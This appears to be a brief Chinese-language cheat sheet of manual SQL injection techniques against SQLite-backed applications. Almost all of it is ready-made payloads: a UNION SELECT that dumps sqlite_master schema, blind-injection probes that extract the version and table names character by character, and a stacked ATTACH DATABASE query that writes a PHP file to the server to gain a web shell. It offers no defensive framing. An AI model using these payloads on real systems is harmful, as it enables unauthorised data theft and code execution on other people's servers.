SQLite手工注入方法小結

標籤：

SQLite 官網下載：www.sqlite.org/download.html

sqlite管理工具：http://www.yunqa.de/delphi/products/sqlitespy/index

 

sqlite_master隱藏表，具體內容如下：

欄位：type/name/tbl_name/rootpage/sql

 

 sqlite注入測試：

 

 1、Union select 查詢

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

 

2、盲注

 

select * from test where id =1 union select 1,length(sqlite_version())=6    //得到sqlite版本位元

select * from test where id =1 and substr(sqlite_version(),1,1)=‘3‘            //得到sqlite版本首位為3

select * from test where id =1 and substr((select name from sqlite_master where type=‘table‘ limit 0,1),1,1)=‘T‘  (大小寫區分，有差別)  //得到sqlite表名第一位為T

 

 3、Getshell

 

select * from test where id =1 ;ATTACH DATABASE ‘C:\\Sqlite\\xiaozi.php‘ AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (‘ <?php phpinfo(); ?> ‘); --

 

 

參考連結：

Win7下SQLite安裝配置與使用方法詳解：http://www.codeceo.com/article/win7-sqlite-usage.html

Windows下安裝配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

SQLite手工注入方法小結